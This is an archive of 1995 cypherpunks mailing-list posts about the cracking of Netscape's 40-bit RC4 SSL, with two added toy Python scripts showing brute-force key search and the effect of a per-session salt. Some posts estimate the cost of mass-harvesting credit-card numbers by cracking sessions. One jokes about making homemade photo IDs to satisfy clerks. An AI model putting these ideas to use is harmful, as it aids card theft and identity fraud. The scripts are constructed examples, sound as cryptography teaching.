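The salt argument in the message above, as an added example (not code from the post or from any SSL implementation): one pass over the secret key bits can be shared only among messages whose MD5 input is otherwise identical, so a public per-message salt makes the work scale with the number of messages. The key derivation is a simplified model, and the 12-bit secret, the salts and the plaintext prefix are constructed so the script runs in about a second.

```python
import hashlib

SECRET_BITS = 12            # toy size so one sweep is fast; the case on the page is 40 bits
KNOWN_PREFIX = b"GET / HT"  # constructed stand-in for a predictable start of message


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Standard RC4: key schedule, then n bytes of keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def session_key(secret: int, salt: bytes) -> bytes:
    """Simplified model (assumption): RC4 key = MD5(secret bits || public salt).
    The real derivation has more inputs; what matters here is that public
    per-message data is hashed together with the secret bits."""
    return hashlib.md5(secret.to_bytes(2, "big") + salt).digest()


def encrypt_prefix(secret: int, salt: bytes) -> bytes:
    """First ciphertext bytes of a message that starts with KNOWN_PREFIX."""
    ks = rc4_keystream(session_key(secret, salt), len(KNOWN_PREFIX))
    return bytes(k ^ p for k, p in zip(ks, KNOWN_PREFIX))


def make_target(secret: int, salt: bytes):
    """What is visible on the wire: the public salt and the ciphertext prefix."""
    return salt, encrypt_prefix(secret, salt)


def sweep(targets):
    """Exhaust the secret space once per distinct salt.

    Targets sharing a salt are checked together with a set lookup, so they
    ride along at no extra key setups. Targets with different salts cannot
    share a pass, because the same secret hashes to a different RC4 key.
    Returns ({(salt, ciphertext): secret}, number_of_key_setups).
    """
    by_salt = {}
    for salt, ct in targets:
        by_salt.setdefault(salt, set()).add(ct)

    recovered = {}
    key_setups = 0
    for salt, wanted in by_salt.items():
        for secret in range(1 << SECRET_BITS):
            key_setups += 1
            ct = encrypt_prefix(secret, salt)
            if ct in wanted:
                recovered[(salt, ct)] = secret
    return recovered, key_setups


if __name__ == "__main__":
    secrets = [0x123, 0xABC, 0x7FF, 0x001]  # constructed sample secrets

    # No salt: every message with the same secret bits uses the same RC4 key.
    unsalted = [make_target(s, b"") for s in secrets]
    # Distinct 11-byte (88-bit) public salt per message, constructed values.
    salted = [make_target(s, bytes([i]) * 11) for i, s in enumerate(secrets)]

    for label, targets in (("unsalted", unsalted), ("salted", salted)):
        found, cost = sweep(targets)
        print(f"{label}: {len(found)} keys found, {cost} key setups "
              f"({cost // (1 << SECRET_BITS)} full sweeps)")
```
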




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 17 Aug 95 12:32:03 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
Message-ID: <199508171930.MAA18815@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I can see three ways in which RC4-40 is weaker now than it was when it
was approved for "fast track" export approval.

First, of course, computers get faster every year.  So any fixed cipher
becomes relatively weaker as time goes on.

Second, until earlier this year RC4 was secret.  Then it was posted
anonymously to the cypherpunks list and later to sci.crypt.  Before that
time, only a much smaller number of people would have been in a position
to launch an exhaustive search attack.  But now that the source is
public, virtually anyone can try to crack it.  So this is really a very
significant loss of security.  It also illustrates the difficulty in
keeping secrets which will occur due to the kind of technology we
advocate.

Third, there is much more interest now in actually doing massively
parallel encryption attacks.  The RSA-129 project got a lot of publicity,
and it was followed by the attack on the "Blacknet" 384 bit PGP key by a
small private group earlier this year.  People are aware now of how easy
it is to use parallelism in this kind of work, and with the software Adam
Back has worked on this could become even more popular in the future.  So
all this talk about "6,000 MIPS years" will not be as impressive if any
moderately sized hacker group can put that much computing power together
in a few days.

With these changes, RC4-40 has lost a significant amount of the
cryptographic strength it may have had a year or two ago.  It is
certainly time for the exportable key size to be expanded.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 17 Aug 95 12:39:52 PDT
To: cypherpunks@toad.com
Subject: Strong encryption for credit cards only
Message-ID: <199508171938.MAA19803@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


In response to the SSL break, Netscape has said they are working on
improved encryption specifically for credit card numbers.  This would use
56 bit keys, presumably DES.  I got this from the SJ Mercury News online,
<URL:http://www.sjmercury.com/nav.htm>.

While we can applaud any measure to increase user privacy and security,
it will be unfortunate if this enhanced encryption, which will
apparently be limited strictly to credit card information in order to
get export approval, weakens support for efforts to allow expanded
export approval of all sorts of encryption.

There are many aspects to privacy beyond credit card numbers.  The bottom
line remains that overseas companies are able to put stronger encryption
in their products than American companies can in their export versions.
We need to keep offering good arguments for why users will need strong
encryption for more than their credit card info.  If the message gets out
that this new measure solves the security problems on the internet then
that will be a big loss for our goals.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 17 Aug 95 09:40:53 PDT
To: cypherpunks@toad.com
Subject: Breaking RC4-40 for less
Message-ID: <9508171639.AA22016@all.net>
MIME-Version: 1.0
Content-Type: text


Since messages sent with netscape are fairly standard for the first so
many bytes, why not make a 2^30 element table, store it on a few
gigabytes of disk space, use a hash table on the message, and find the
keys to one in every 1,000 messages about 1 time per second.  If this
code is being used to send millions of credit transactions per day, we
should be able to decode thousands of credit card numbers per day for a
one-time cost of about $5,00.

The $10,000 estimate of the cost of computing time is far too high
for a production-based attack on the netscape codes.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Thu, 17 Aug 95 12:50:00 PDT
To: cypherpunks@toad.com
Subject: Re: Cost to Crack Keys
In-Reply-To: <ac58d999110210044b77@[205.199.118.202]>
Message-ID: <199508171949.MAA03937@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> tcmay@got.net (Timothy C. May) writes:
> For example, one doesn't say "Hey, I don't see how Hertz can charge $40 a
> day to rent a car...my friend lets me use his for free."

> "Standard accounting practices" dictate the way to estimate production costs.

Actually, I do say that, but in a slightly different way.  If I want to
estimate the cost to get home from the airport, I might say "I have two
friends with cars who might give me a ride, or I could rent a car from
Hertz."  Most of the time a free car will be available; once in the last
couple of years I rented a car at the airport to get home.  My average
cost hasn't been zero, but has certainly been a lot less than $40 ($29
from National, but that's not important now).

Finding a cheap or free ride from one place to another should not be a
problem if you live in a city of helpful people driving to and fro in
vehicles with no passengers.

There are lots of free seats on the CPU bus today!

Share and enjoy...

	Jim Gillogly
	Highday, 25 Wedmath S.R. 1995, 19:46




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Thomlinson <mattt@microsoft.com>
Date: Thu, 17 Aug 95 13:39:55 PDT
To: tcmay@got.net
Subject: Re: First known purchase of physical goods with cyberbucks
Message-ID: <9508172125.AA12793@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


don't forget GhostMarks! :)

matt
----------
From: Timothy C. May  <tcmay@got.net>
To: "Marcel van der Peijl"  <bigmac@digicash.com>;  <mark@unicorn.com>
Cc:  <cypherpunks@toad.com>;  <ecm@ai.mit.edu>;  <steve@webmedia.com>
Subject: Re: First known purchase of physical goods with cyberbucks
Date: Thursday, August 17, 1995 11:59AM

At 6:39 PM 8/17/95, Marcel van der Peijl wrote:
>> Anyway, if anyone knows of an earlier transaction of cyberbucks for physical
>> goods than this (at 15:00 GMT 17th August 1995), then please let me know.
>
>As far as I know, the first transaction took place when I (while
>testing) bought a postcard from GlobalX, the first ecash store to
>open besides our own (and mine). It is stored in the 'DigiCash
>museum' next to early prototypes of all kinds of smartcards,
>emulators, wallets etc.
>
>This must have been around October last year (or August? Can't make
>out the postmark). Hundreds of cards were shipped by several shops,
>and stickers, lotteries, etc. Check the 'physical objects' section
>on http://www.digicash.com/shops/categorical.html
>
>Maybe you should restrict the 'first known' claim to 'first known
>purchase of physical goods with cyberbucks traded at the ECM'.
>
>Sorry!

Also, there are other potential claims for this sort of thing. Based on
varying extents to which the "electronic money" is really secure, is
cryptographically interesting, etc.

For example, more than two years ago on this list (I think it was spring of
'93, but it could've been spring of '94) there was a flurry of
transactions involving the "MagicMoney" and "TackyTokens" of Pr0ductCypher
and others. I recall Black Unicorn and others talking about transactional
exchanges involving sixpacks of beer or soft drinks. I could check my
archives, but you get the point.

And before that, there were "HExmarks" being used on the Extropians list.
There was a nominal conversion rate to real dollars, and at the time I left
that list, I had more HExmarks than anyone else.

And dozens of token-based systems, coupons, LETS systems, etc. Not to
mention the various commercial smartcards and "e money" systems.

Granted, most of these are not "Chaumian," which is what most of us think
of as digital cash.

Claiming credit for being first is a tough issue.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Thu, 17 Aug 95 11:27:25 PDT
To: gpowers@spectrum.bradley.edu
Subject: Re:  Netsacpe's Offical Response
Message-ID: <199508171825.NAA16520@edison.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>So in conclusion, we think RC4-40 is strong enough to protect consumer-level
>credit-card transactions -- since the cost of breaking the message is
>sufficiently high to make it not worth the computer time required to do so
....
....
>Finally, we'd like to reiterate that all this person has done is decrypt
>one single RC4-40 message. RC4 the algorithm and products which use the
>algorithm remain as secure as always.
>
>
>

I disagree with the cost assumptions that it costs $10K. These
are "relatively" imaginary costs. If you already have the machines 
(like a lot of universities and corporations) then the marginal
cost of breaking the key is practically nil. The person doing the
cracking certainly doesn't incur any costs. So what if it takes
2 weeks. An evil student/hacker/whatever would be willing to wait two
weeks for a credit card with a $5-$oo limit if he could just use
the machines at night when people might not notice. 
Just my $.02

Re: security of RC4 - agreed completely.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Taffs <dat@ebt.com>
Date: Fri, 18 Aug 95 07:49:51 PDT
To: maryt@wv.mentorg.com
Subject: [frissell@panix.com: Re: CoS Raid on "Copyright Terrorist"]
Message-ID: <9508172030.AA10875@veronica.EBT.COM>
MIME-Version: 1.0
Content-Type: text/plain


--RAK01412.808623897/portland.ebt.com
Content-Type: message/rfc822

From: David Taffs <dat>
Date: Tue, 15 Aug 1995 17:50:51 +0800
Message-Id: <9508160050.AA10092@veronica.EBT.COM>
To: maryt@wv.mentorg.com
Subject: [frissell@panix.com: Re: CoS Raid on "Copyright Terrorist"]

Date: Tue, 15 Aug 1995 16:00:06 -0400
To: m5@dev.tivoli.com (Mike McNally)
From: Duncan Frissell <frissell@panix.com>
Subject: Re: CoS Raid on "Copyright Terrorist"
Cc: cypherpunks@toad.com

At 01:17 PM 8/15/95 CDT, Mike McNally wrote:

>Mailboxes Etc. insists on getting a picture ID; at least they did last
>time I checked.  Some smaller mom&pop places will take a business card
>(time to break out your Jim Rockford Business Card Fabrication Kit).

I always supply picture ID these days.  It's really rough getting those cold
lamination-Employee ID kits from Office Depot, taking the polaroid on a blue
background, trimming the photo, and assembling the employment ID.  I'm one
of my best employees.

Don't forget to include your EMP_NO.  It gives the clerk something to write
down.

DCF

"Governments are simply not fully sovereign in the world of information;
their powers within it are strangely limited....This weakness of government
control within computer nets--a product of strongly protected privacy, a
lack of frontiers and confusions of jurisdiction--make them natural places
for subversion." -- The Economist "Softwar--A Survey of Defence Technology"



--RAK01412.808623897/portland.ebt.com--





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Taffs <dat@ebt.com>
Date: Fri, 18 Aug 95 07:49:50 PDT
To: maryt@wv.mentorg.com
Subject: [frissell@panix.com: Re: CoS Raid on "Copyright Terrorist"]
Message-ID: <9508172033.AA10908@veronica.EBT.COM>
MIME-Version: 1.0
Content-Type: text/plain


--RAV01412.808624601/portland.ebt.com
Content-Type: message/rfc822

From: David Taffs <dat>
Date: Tue, 15 Aug 1995 12:04:37 +0800
Message-Id: <9508151904.AA08383@veronica.EBT.COM>
To: maryt@wv.mentorg.com
Subject: [frissell@panix.com: Re: CoS Raid on "Copyright Terrorist"]

Date: Tue, 15 Aug 1995 09:18:43 -0400
To: futplex@pseudonym.com (Futplex)
From: Duncan Frissell <frissell@panix.com>
Subject: Re: CoS Raid on "Copyright Terrorist"
Cc: cypherpunks@toad.com

At 09:28 AM 8/14/95 -0400, Futplex wrote:
>Some CoS news:
>
>This past Saturday (95/08/12) a prominent Church of Scientology litigator,
>Helena Kobrin, and some U.S. federal marshals raided the home of Arnaldo
>Lerma, seizing pretty much all his computer hardware, disks, etc.

So why is it that people insist on listing their home addresses with their
ISP's rather than a mail receiving service or something else.  It is very
hard to raid a mail drop and obtain anything useful.  While it is true that
if you blow up buildings, the Fibbies may be able to find you, quite simple
techniques can frustrate even quite dedicated private parties.

DCF

"We warned you mental defectives back in '65 that the socialized medicine
offered by Medicare and Medicaid would be expensive, lousy, and eventually
not there at all but you didn't believe us.  Good luck."



--RAV01412.808624601/portland.ebt.com--





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 17 Aug 95 11:38:27 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: RC40 and what we still need to do
Message-ID: <Pine.ULT.3.91.950817133221.13723B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have been watching the backlash of the cracking of RC40 and am quite 
impressed with the fact that it is being used as a positive reason for 
repealing ITAR.  I expected the media to jump on the "hacker" bandwagon 
and denounce the efforts.

However, I think there is still value in writing the software that will 
allow cooperation among hundreds or thousands of people.  That way, we 
could harness the spare CPU of machines all over the globe and make the 
cracking of this kind of stuff routine.  So instead of taking 8 days, it 
takes only a day or so, further eliminating the idea that it "takes too 
long to be worthwhile".  Maybe there would even be value in going at a 
128-bit key (granted, it would take a year).

I'd anticipate with proper advertising, easy-to-use software, and 
little programming knowledge required, we could easily harness 10,000+ 
machines and a few dozen parallel machines.

I know we have a 99.9% idle MasPAR I can contribute to the effort, which 
should be able to do 1million+ keys/sec.  It's just dying to have a 
purpose....

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMDNwmDokqlyVGmCFAQEzTQQAtkDhi0XD1L1PGJgSYA0XcxMXOIszjtB0
sQcHdSqeVHBpIn7K0/F4JE0tiIgXFhmaKsU8FaIaf/5sbDpRj/cTZXnvE/evt4G0
GKploXjcqXQ/dBpSWakCzsKLJvqvhKEyZyAnF/5VHgSI5WChMKYm68qiuDNyN05Q
He6bvbZGbBs=
=oPni
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++) ULU++ P+ L++ E---- W+(-) N++++ o+ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G+++++ e++ h r-- y++**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Thu, 17 Aug 95 11:47:53 PDT
To: cypherpunks@toad.com
Subject: Message from a nobody...
Message-ID: <Pine.BSI.3.91.950817134106.18935A-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



I'm kind of a nobody.....
I can't write elaborate code.
I can't even crack keys, unless it's plug & play cracking.

But I do know SOMETHING important was done here.
And once it's been done, it only gets easier each time.

Congratulations to all of you!

Love Always,

Carol Anne

Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 17 Aug 95 14:04:59 PDT
To: cypherpunks@toad.com
Subject: new o'reilly security book
Message-ID: <199508172102.OAA04409@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



------- Forwarded Message

Date: Tue, 15 Aug 1995 14:08:44 -0700
From: Sara Winge <sara@ora.com>
Subject: New "Computer Crime" book from O'Reilly

FOR IMMEDIATE RELEASE                    
August 15, 1995                                   

TO REQUEST A REVIEW COPY, CONTACT: 
Sara Winge                             
sara@ora.com
707/829-0515

O'REILLY RELEASES HANDBOOK ON FIGHTING COMPUTER CRIME

SEBASTOPOL, CA--"Computer Crime: A Crimefighter's Handbook" is a
resource for anyone who needs to know what today's computer crimes look
like, how to prevent them, and how to detect, investigate, and
prosecute them if they do occur.  It contains basic computer security
information as well as extensive guidelines for investigators, law
enforcement, managers, and computer system administrators. The book has
been reviewed by representatives of the U.S. Secret Service, the
Department of Justice, local police departments, district attorney's
offices, and law enforcement abroad.

"Computer Crime" describes the varieties of computer crimes and
profiles the computer criminal, using techniques developed for the FBI
and other law enforcement agencies. It outlines the vulnerabilities of
computer systems and discusses personnel, operational, physical, and
communications measures that can be taken to prevent computer crimes.
In addition, it contains a thorough treatment of effective methods for
investigating and prosecuting computer crimes, ranging from the
supplies needed for criminal investigation, to the detection and audit
tools used in investigation, to the presentation of evidence to a
jury.

                          # # # 

Computer Crime: A Crimefighter's Handbook 
By David Icove, Karl Seger & William VonStorch, with Consulting Editor
Eugene H. Spafford 
1st Edition August 1995 
464 pages, ISBN:  1-56592-086-4, $24.95






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 17 Aug 95 14:06:45 PDT
To: cypherpunks@toad.com
Subject: nontoxic neuron interface built
Message-ID: <199508172104.OAA04707@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



for all of you eagerly awaiting the day you can literally "jack in"
to cyberspace..

------- Forwarded Message

Date: Wed, 16 Aug 95 13:44:34 -0400 
Subject: FW: 'Cyberpunk' neural interface?


- - ----------
From: James McDaniel

The following item is taken from:

	http://www.hep.net/documents/newsletters/pnu/1995/pnu-236.html

James

- - --------------------

PHYSICS NEWS UPDATE
The American Institute of Physics Bulletin of Physics News
Number 236: August 7, 1995 by Phillip F. Schewe and Ben Stein

A SILICON DEVICE FOR TRIGGERING ELECTRICAL ACTIVITY IN A NERVE CELL
has been constructed, opening possibilities for two-way, non-toxic
communication between computer chips and nerve cells. Previous
devices for stimulating nerve cells were metallic devices generating
ordinary electric currents. Not only do such devices have
corrosion-prone electrodes, but their currents create
electrochemical byproducts and heat that could damage the nerve
cells and themselves. The silicon device, constructed by
researchers at the Max Planck Institute for Biochemistry in
Germany, contains a "stimulation spot" that triggers neural
activity simply through the rearrangement of electric charge.
Insulated by silicon oxide, the stimulation spot has a size
(between 10 and 50 microns) matched to that of a leech nerve
cell to which it is connected. A voltage pulse applied to the
spot rearranges electric charge on the silicon oxide film and
the insulating membrane of the nerve cell, creating a buildup
of positive charge in the nerve cell which causes it to fire
above a certain threshold. The silicon device is capable of
triggering a single nerve cell without affecting other nearby
neurons. The device complements the previously designed "neuron
transistor," which receives ionic signals from nerve cells
and transcribes them to electronic signals in silicon. "These
two devices join the two worlds of information processing, the
silicon world of the computer and the water-world of the brain,"
says the Max Planck Institute's Peter Fromherz
(fromherz@vms.biochem.mpg.de). Developing this device for
biomedical applications, such as computer-controlled artificial
limbs, is not envisioned at the present moment, as researchers
will first need to build and understand devices that interact
with connective tissue and other non-neuronal cells in the body.
(Peter Fromherz and Alfred Stett, upcoming article in Physical
Review Letters; text and figures are available from AIP Public
Information, 301-209-3091, physnews@aip.org.)





- ------- End of Forwarded Message


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 17 Aug 95 11:27:24 PDT
To: aba@dcs.exeter.ac.uk
Subject: Re: Breaking DES anyone? (was: Breaking RC4-40 for less)
In-Reply-To: <8875.9508171811@exe.dcs.exeter.ac.uk>
Message-ID: <9508171825.AA26001@all.net>
MIME-Version: 1.0
Content-Type: text


> Nice idea and one which works for pure RC4, but unfortunately not for
> 128 bit, 88 bit known + 40 bit unknown "export" SSL.
> 
> Netscape's SSL uses "40 bit keys" that are composed in a strange way:
> you are given 88 bits of known key, and this is combined with the 40
> bit key, to give a 128 bit key.  That key is used to do the
> encryption.  The problem is that this has a unix password salt like
> effect, only this time there are 88 bits of salt rather than 12 bits.
> So this means that you can't precompute anything on the 40 bits as the
> 88 bits are randomly generated, and likely vary with each session.

Ah!!!

Then here's my next alternative attack.

Buy a 100x100 Transputer (about $120,000 to make one) and program it to
crack the SSL running 10,000 parallel computations.  If it takes 2 years
for the whole keyspace for each computer, it takes 1.75 hours to span
the whole key space.  Taking a 3 year write-off time and spending
$30,000 per year for maintenance, this comes to $70,000 per year, or
$14.08 per cracked key.  If I do 1,000 keys in parallel, that reduces
the cost to 1.4 cents per key.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Neal <dneal@usis.com>
Date: Thu, 17 Aug 95 12:35:56 PDT
To: "Rev. Mark Grant" <mark@unicorn.com>
Subject: Re: First known purchase of physical goods with cyberbucks
In-Reply-To: <Pine.3.89.9508171704.A1363-0100000@unicorn.com>
Message-ID: <Pine.BSI.3.91.950817135759.5199C-100000@usis.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 17 Aug 1995, Rev. Mark Grant wrote:

> 
> [Feel free to forward to anywhere you feel is appropriate]
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> 
> For some time now, Adam Back has been offering to sell RSA T-shirts for
> cyberbucks (DigiCash's experimental anonymous digital cash system), but
> no-one has had enough available to take him up on it. However, thanks to
> the success of the ecm mailing list (ecm@ai.mit.edu) and WWW site
> (http://www.c2.org/~mark/ecash/ecash.html), today I finally managed to 
> collect enough c$ to buy one.

I just had a wicked thought. What happens when people combine challenge key
cracking with e-cash?

Lesse -- 2^40 keys = 1,099,511,627,776 keys.  Damien was able to get
850000-1.3 million keys per second.  Let's go for the low-end and
use 8000 keys per second which is in the range of his sparcstations
(a very common machine on the internet).  We "only" need 38,178
machines to crack the key in 8 hours.   Each of those workstations
is going to test 28,800,000 keys and we'll assign a nominal value of
$1,000 to cracking the key.  (Most people have $1k of room on their
visa or m/c, no?)  Splitting the booty 50/50 gives someone $500 
or about 1.79 e-cents per 100k keys tested. 

So, could 38,000 people be enticed into running a sparc-cycle
cracking daemon for a 1 in 38,000 chance at $500?  :-)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 17 Aug 95 06:42:41 PDT
To: perry@piermont.com ("Perry E. Metzger")
Subject: Re: SSL challenge -- broken !
Message-ID: <7033.9508171341@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



> It has occurred to me that, because the RC4 key crackers spend most
> of their time in key setup, you can crack N SSL sessions that you
> captured in not substantially more time than it took to crack
> 1. This is analogous to the way brute force Unix password file
> hacking operates.

This occurred to me a while ago too, and I thought it a very cool
idea, as it would mean you could do loads of keys at once with little
additional compute time.  Then I changed my mind, there's a reason
this doesn't work with 40 + 88 SSL, I think.

It works well enough for straight RC4, as you just compare lots of
keys at once, the RC4 output which will be XORed just gets compared
against lots of sample plain text / cipher texts simultaneously.

The actual key used is the 40 bit key you're bruting, plus what is
effectively an 88 bit salt (in unix password nomenclature, only unix
password salts are typically 12 bits).

The actual 128 bit RC4 key is generated by taking the MD5 of the known
and unknown key bits, plus a couple of other things.  As the 88 known
bits are randomly generated you can't combine work.

If I have misunderstood something, or there is a way to work around
this, please explain, because being able to do this would be a huge
boon to the key breaker.  It would allow you to break keys at a
ferocious rate if you had lots of keys to break.

Adam
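
[Added example, not part of the post above and not code from the list: a toy count of the RC4 key setups needed to search several sessions at once, for straight RC4 versus a key derived with a per-session salt.  Assumptions: the unknown part is shrunk from 40 bits to 10, the salted key is simplified to MD5(secret || salt), and every session value is constructed.]

```python
import hashlib

SECRET_BITS = 10                 # toy stand-in for the 40 unknown key bits
KEYSPACE = 1 << SECRET_BITS
KNOWN_PLAINTEXT = b"GET / HT"    # constructed: predictable first bytes of a message


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Standard RC4: key setup (the expensive part), then n output bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def secret_bytes(secret: int) -> bytes:
    return secret.to_bytes(2, "big")


def salted_key(secret: int, salt: bytes) -> bytes:
    # Assumption: simplified derivation. The post says the real key is the MD5
    # of the known and unknown bits "plus a couple of other things".
    return hashlib.md5(secret_bytes(secret) + salt).digest()


def make_sessions(secrets, salted: bool):
    """Build constructed sessions: an 88-bit salt (if any) and a ciphertext prefix."""
    sessions = []
    for n, secret in enumerate(secrets):
        salt = hashlib.md5(b"constructed salt %d" % n).digest()[:11] if salted else b""
        key = salted_key(secret, salt) if salted else secret_bytes(secret)
        stream = rc4_keystream(key, len(KNOWN_PLAINTEXT))
        sessions.append({"salt": salt, "ciphertext": xor(KNOWN_PLAINTEXT, stream)})
    return sessions


def search_unsalted(sessions):
    """One key setup per candidate, compared against every session at once."""
    targets = {xor(s["ciphertext"], KNOWN_PLAINTEXT): i for i, s in enumerate(sessions)}
    found, setups = {}, 0
    for cand in range(KEYSPACE):
        stream = rc4_keystream(secret_bytes(cand), len(KNOWN_PLAINTEXT))
        setups += 1
        if stream in targets:
            found[targets[stream]] = cand
    return found, setups


def search_salted(sessions):
    """The salt changes the derived key per session, so no setup can be shared."""
    found, setups = {}, 0
    for i, s in enumerate(sessions):
        target = xor(s["ciphertext"], KNOWN_PLAINTEXT)
        for cand in range(KEYSPACE):
            stream = rc4_keystream(salted_key(cand, s["salt"]), len(KNOWN_PLAINTEXT))
            setups += 1
            if stream == target:
                found[i] = cand
    return found, setups


if __name__ == "__main__":
    secrets = [5, 300, 777, 1023]            # constructed session secrets
    for name, salted, search in (("straight RC4", False, search_unsalted),
                                 ("salted (MD5)", True, search_salted)):
        found, setups = search(make_sessions(secrets, salted))
        print(f"{name}: recovered {len(found)} sessions with {setups} key setups")
```

With N sessions the unsalted sweep costs one pass over the key space, while the salted sweep costs N passes, which is the password-salt effect the post describes.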





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Thu, 17 Aug 95 14:48:25 PDT
To: sean@escape.ca
Subject: Re:  More on Netscape
Message-ID: <9508172151.AA14704@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


>It says that the commerce server supports (among others) DES and DES3 
>(same as 3DES?).  They list the key sizes as 64 and 192 bits 
>respectively.  My question is, isn't DES 56 bits?  (with an 8 bit salt 
>that would be 64 I guess), but isn't DES3 112 bits, not 192?

DES keys are specified as 64 bits, of which 8 bits provide odd parity.

The 192 bits would specify three independent keys (not triple DES)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 17 Aug 95 12:51:59 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Silly technical question from a non-technical person
Message-ID: <Pine.ULT.3.91.950817144743.16545A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've been piecing together things on this list that I have only a passing 
understanding of (at a code level).

If it costs $10,000 to crack one 40-bit key (putting aside whether we 
agree on that price or not), could not the software be designed in such a 
manner that it is able to check, say, 10,000 keys at the same time?  Ie, 
it computes a key, and then checks it against the array of data to see if 
it fits any of them, and then goes on to the next one.

Maybe that would be an interesting test.  Randomly compute say 10,000 
sessions and then try to crack them all at the same time.  Theoretically, 
it would reduce that $10,000/crack cost dramatically.

Of course, I could very well be wrong....

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMDOByjokqlyVGmCFAQHFeAP9Hi9rXt1Ij4+nXISXMdfQL7TglB5T0p5P
